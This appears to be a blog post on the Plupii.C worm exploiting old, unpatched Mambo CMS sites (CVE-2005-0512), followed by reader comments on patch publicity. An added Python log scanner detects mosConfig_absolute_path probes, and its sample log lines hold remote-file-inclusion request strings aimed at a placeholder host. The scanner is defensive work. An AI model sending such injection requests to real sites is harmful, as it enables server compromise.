Plupii.C proved: Remarkably old Mambo CMS installations in use

The systems behind Web sites based on content management systems are not always patched. Patching delays are not a matter of weeks. In fact, they run to more than months.

The XML-RPC for PHP vulnerability from June 2005 is not the only security issue being exploited in this new Linux worm case. One of the other vulnerabilities is the GLOBALS['mosConfig_absolute_path'] issue, CVE-2005-0512, reported and fixed exactly one year ago. This code injection issue affects Mambo systems 4.5.2 and earlier.

At this time, Mambo defacement reports from volunteers have helped the Internet Storm Center conclude that a new Plupii variant is spreading. Sometimes even the word ‘mambo’ in the URL helps confirm that Mambo sites are the target of defacement; see new ones at etc.

A fixed Mambo version is available, but administrators simply didn’t patch their systems.
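For admins who want to check whether their own site has been probed for the mosConfig_absolute_path issue, here is a small access-log scan. It is an added example, not code from this post or from the Mambo project. It assumes the variable arrives as a query-string parameter and that the log is in the common "combined" format; the log lines, addresses and host name are constructed.

```python
import re
from urllib.parse import unquote

# "Combined" access-log prefix: client, timestamp, request line, status (assumed format).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# Parameter name from the advisory; covers the bare and GLOBALS[...] forms.
PARAM = re.compile(r"""mosConfig_absolute_path['"]?\]?=([^&\s]*)""")
REMOTE = re.compile(r"^(?:https?|ftp)://", re.I)

def fully_decode(s, rounds=3):
    """Undo nested percent-encoding so an encoded scheme cannot hide a URL."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def scan(lines):
    """Return one finding per request that tries to set the Mambo path variable."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target, status = m.groups()
        for pm in PARAM.finditer(fully_decode(target)):
            value = pm.group(1)
            findings.append({
                "line": lineno,
                "client": client,
                "status": int(status),
                # A URL value means the request pointed the path at another host.
                "kind": "remote-include" if REMOTE.match(value) else "probe",
                "value": value,
            })
    return findings

# Constructed sample log lines (documentation addresses, .invalid host name).
SAMPLE = [
    '192.0.2.10 - - [20/Feb/2006:10:01:02 +0000] "GET /mambo/index.php?option=com_content&task=view&id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Feb/2006:10:01:09 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http://host.invalid/a.txt? HTTP/1.0" 200 312',
    '198.51.100.7 - - [20/Feb/2006:10:01:11 +0000] "GET /mambo/index.php?GLOBALS%5BmosConfig_absolute_path%5D=%2568ttp%3A%2F%2Fhost.invalid%2Fa.txt HTTP/1.0" 404 210',
    '203.0.113.5 - - [20/Feb/2006:10:02:00 +0000] "GET /index.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Only query strings show up in access logs, so a clean result does not cover requests that carried the parameter in a POST body.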

  • AK

    IMO the Mambo crew didn’t do nearly enough to publicize the security patch from last November. Then the 4.5.3 release came a week later, and the official announcement of that release made only vague references to “security enhancements” buried deeply in the second paragraph.

    I appreciate the Mambo crew’s timely announcement of the latest vulnerability on the new security mailing list (set up in mid-December). However, I can see how even conscientious admins could miss a single news posting made right before a USAnian holiday weekend.

  • Peter Sinclair

    If sites are running XML-RPC for PHP 1.1 when that was patched 8 months ago, and if Mambo users have not checked for updates any time in the past year, then I have no sympathy for anyone that might be exploited by this worm. The particular Mambo version that was vulnerable was updated a year ago.

    I am not convinced there is any new threat. I heard that the guys at vnunet who first reported on this so-called Mambo vulnerability saw the old Secunia advisory and missed seeing that it was published on 2005-2-21. Can’t blame them, it’s easy to see the February date and miss seeing the year.

    AK has a point about the Mambo announcement, but all releases of Mambo 4.x contain security enhancements – it’s a moving target to keep ahead of the script kiddies. The latest advisory at least saw a patch being issued immediately.

    I think the team here should be more careful about their sources of information tho – I mean, c’mon, telling people to update to a version that is a year old is just a little silly! Not as silly as not noticing the date on the Secunia advisory, but it comes a close second ;)

  • sunshine

    Look at the title: old – still in use